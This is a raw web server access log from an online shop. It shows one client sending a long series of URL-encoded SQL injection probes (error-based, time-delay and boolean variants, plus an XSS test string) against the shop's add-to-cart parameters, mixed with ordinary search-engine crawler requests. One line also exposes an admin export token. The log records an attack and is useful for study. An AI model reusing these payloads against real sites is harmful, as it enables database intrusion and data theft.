193.29.13.243 - - [17/Jul/2022:19:24:31 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%201759%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281759%3D1759%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75331 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:34 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%201759%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281759%3D1759%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27bCDY%27%3D%27bCDY&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75369 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:37 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%201759%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281759%3D1759%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%27cRVj%27%3D%27cRVj&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75363 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:41 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%201759%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281759%3D1759%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29--%20mRdU&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75340 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:45 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%202162%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282162%3D2162%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%285738%3D5738&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75447 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:48 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%202162%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282162%3D2162%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75421 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:52 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%202162%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282162%3D2162%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27wXcf%27%3D%27wXcf&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75459 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:24:56 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%202162%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282162%3D2162%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27UcTc%27%3D%27UcTc&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75453 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
54.36.148.106 - - [17/Jul/2022:19:25:00 +0200] "GET /usa-bedclothes-140-200-cm-p-26084.html HTTP/1.0" 301 71556 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
193.29.13.243 - - [17/Jul/2022:19:25:00 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%202162%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282162%3D2162%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20YAka&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75430 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:05 +0200] "GET /moki-bedspread-gray-p-56950.html?action=%28SELECT%20CONCAT%28CONCAT%28%27qbpzq%27%2C%28CASE%20WHEN%20%286155%3D6155%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qqkjq%27%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75161 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:08 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%3BSELECT%20PG_SLEEP%285%29--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75060 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:11 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%3BSELECT%20PG_SLEEP%285%29--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75057 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.42 - - [17/Jul/2022:19:25:12 +0200] "GET /small-baby-teeth-irina-p-45399.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:25:14 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%3BSELECT%20PG_SLEEP%285%29--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75063 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:17 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%3BSELECT%20PG_SLEEP%285%29--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75060 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
66.249.70.88 - - [17/Jul/2022:19:25:19 +0200] "GET /dragonfly-wall-decoration-multicolore-model-p-55404.html HTTP/1.0" 200 75146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:25:20 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75069 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:23 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75066 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.26 - - [17/Jul/2022:19:25:25 +0200] "GET /coffee-shop-metal-tray-p-35045.html?action=add_product HTTP/1.0" 302 476 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:25:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75072 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:30 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75069 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:34 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2869%29%7C%7CCHR%2869%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75158 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:37 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2869%29%7C%7CCHR%2869%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75155 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:40 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2869%29%7C%7CCHR%2869%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75161 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:44 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28111%29%7C%7CCHR%2869%29%7C%7CCHR%2869%29%7C%7CCHR%28100%29%2C5%29%20FROM%20DUAL--&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75158 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:48 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%20%28SELECT%207369%20FROM%20%28SELECT%28SLEEP%285%29%29%29iZxs%29%20AND%20%281747%3D1747&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75126 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:51 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%20%28SELECT%207369%20FROM%20%28SELECT%28SLEEP%285%29%29%29iZxs%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75100 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:25:54 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%20%28SELECT%207369%20FROM%20%28SELECT%28SLEEP%285%29%29%29iZxs%29%20AND%20%28%27Wojr%27%3D%27Wojr&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75138 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
51.68.224.127 - - [17/Jul/2022:19:25:57 +0200] "GET /adminweb/export_orders_xml.php?token=256de2z6edz6ed2z6DFSFsed2zed6zeDSFDSGdzedezfzf&maxorders=10&orderstart=1&status=14&start_date=2018-10-01 HTTP/1.0" 200 285 "-" "GesCom CharlotteBoutik Serveur"
51.68.224.127 - - [17/Jul/2022:19:25:57 +0200] "GET /adminweb/export_orders_xml.php?token=256de2z6edz6ed2z6DFSFsed2zed6zeDSFDSGdzedezfzf&maxorders=10&orderstart=1&status=6&start_date=2018-10-01 HTTP/1.0" 200 31081 "-" "GesCom CharlotteBoutik Serveur"
193.29.13.243 - - [17/Jul/2022:19:25:57 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%20%28SELECT%207369%20FROM%20%28SELECT%28SLEEP%285%29%29%29iZxs%29%20AND%20%27vaNg%27%3D%27vaNg&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75132 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:01 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%20%28SELECT%207369%20FROM%20%28SELECT%28SLEEP%285%29%29%29iZxs%29--%20kgDw&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75109 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.12 - - [17/Jul/2022:19:26:03 +0200] "GET /harley-davidson-zippo-lighter-p-43714.html HTTP/1.0" 200 74641 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:26:03 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%206243%3D%28SELECT%206243%20FROM%20PG_SLEEP%285%29%29%20AND%20%287507%3D7507&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75114 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:07 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%206243%3D%28SELECT%206243%20FROM%20PG_SLEEP%285%29%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75088 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:11 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%206243%3D%28SELECT%206243%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27JeKM%27%3D%27JeKM&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75126 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:14 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%206243%3D%28SELECT%206243%20FROM%20PG_SLEEP%285%29%29%20AND%20%27zivx%27%3D%27zivx&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75120 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.9 - - [17/Jul/2022:19:26:15 +0200] "GET /buddha-canvas-frame-p-57709.html HTTP/1.0" 200 74763 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:26:18 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%206243%3D%28SELECT%206243%20FROM%20PG_SLEEP%285%29%29--%20TKJi&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75097 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
66.249.70.88 - - [17/Jul/2022:19:26:21 +0200] "GET /beer-here-illuminated-sign-p-50190.html HTTP/1.0" 301 71556 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:26:21 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%289354%3D9354&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75090 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
66.249.70.88 - - [17/Jul/2022:19:26:22 +0200] "GET /-p-50190.html HTTP/1.0" 200 71489 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.36.148.83 - - [17/Jul/2022:19:26:24 +0200] "GET /jiminy-cricket-mini-figurine-p-51180.html HTTP/1.0" 200 75826 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.237 - - [17/Jul/2022:19:26:26 +0200] "GET /images/big_prod_2/1328399219377b.jpg HTTP/1.0" 200 271 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.69 - - [17/Jul/2022:19:26:26 +0200] "GET /images/big_prod/1328399219377.jpg HTTP/1.0" 200 268 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.62 - - [17/Jul/2022:19:26:26 +0200] "GET /images/big_prod_1/1328399219377a.jpg HTTP/1.0" 200 271 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.167 - - [17/Jul/2022:19:26:26 +0200] "GET /images/big_prod_3/1328399219377c.jpg HTTP/1.0" 200 271 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
193.29.13.243 - - [17/Jul/2022:19:26:25 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20WAITFOR%20DELAY%20%270%3A0%3A5%27&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75064 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.22 - - [17/Jul/2022:19:26:27 +0200] "GET /harold-potholder-21-cm-p-43818.html HTTP/1.0" 301 74211 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:26:29 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27jCKE%27%3D%27jCKE&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75102 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.26 - - [17/Jul/2022:19:26:30 +0200] "GET /harold-potholder-p-43818.html HTTP/1.0" 200 74128 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:26:32 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27DZPR%27%3D%27DZPR&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75096 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
17.121.112.170 - - [17/Jul/2022:19:26:37 +0200] "GET /robots.txt HTTP/1.0" 200 245 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
193.29.13.243 - - [17/Jul/2022:19:26:36 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20yRLS&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75073 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
17.121.112.170 - - [17/Jul/2022:19:26:37 +0200] "GET /chaque-jour-aventure-melamine-dish-cake-p-37908.html HTTP/1.0" 200 74288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
193.29.13.243 - - [17/Jul/2022:19:26:40 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20AND%205435%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%2875%29%7C%7CCHR%2890%29%2C5%29%20AND%20%285170%3D5170&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75169 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:44 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%205435%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%2875%29%7C%7CCHR%2890%29%2C5%29&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75143 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:48 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20AND%205435%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%2875%29%7C%7CCHR%2890%29%2C5%29%20AND%20%28%27IhKd%27%3D%27IhKd&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75181 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:51 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20AND%205435%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%2875%29%7C%7CCHR%2890%29%2C5%29%20AND%20%27wVXD%27%3D%27wVXD&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75175 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:54 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20AND%205435%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%2875%29%7C%7CCHR%2890%29%2C5%29--%20OeFd&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75152 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:26:57 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%29%20ORDER%20BY%201--%20EheO&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75057 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:02 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20ORDER%20BY%201--%20Shtz&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75054 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:07 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%29%20ORDER%20BY%201--%20geSk&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75060 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
185.191.171.18 - - [17/Jul/2022:19:27:12 +0200] "GET /candy-cloud-notepad-bella-p-49841.html HTTP/1.0" 200 74175 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:27:12 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%27%20ORDER%20BY%201--%20JzsE&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75057 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:18 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product%20ORDER%20BY%201--%20Lubq&cart_quantity=1&products_id=56950 HTTP/1.0" 200 75054 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:22 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27%29.%22%29%29%28%29%29%2C&products_id=56950 HTTP/1.0" 302 520 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:22 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27yQuBAk%3C%27%22%3EbrDIYN&products_id=56950 HTTP/1.0" 302 519 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
207.46.13.23 - - [17/Jul/2022:19:27:24 +0200] "GET /images/3661443603141.jpg HTTP/1.0" 200 259 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.191.171.43 - - [17/Jul/2022:19:27:24 +0200] "GET /wonder-woman-cork-coaster-p-8796.html HTTP/1.0" 200 74113 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.29.13.243 - - [17/Jul/2022:19:27:26 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%29%20AND%209967%3D7658%20AND%20%284871%3D4871&products_id=56950 HTTP/1.0" 302 538 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:26 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%20AND%209874%3D3158&products_id=56950 HTTP/1.0" 302 512 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:26 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%20AND%206267%3D2297--%20hTib&products_id=56950 HTTP/1.0" 302 521 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:26 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27%29%20AND%202679%3D3283%20AND%20%28%27bjTV%27%3D%27bjTV&products_id=56950 HTTP/1.0" 302 550 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
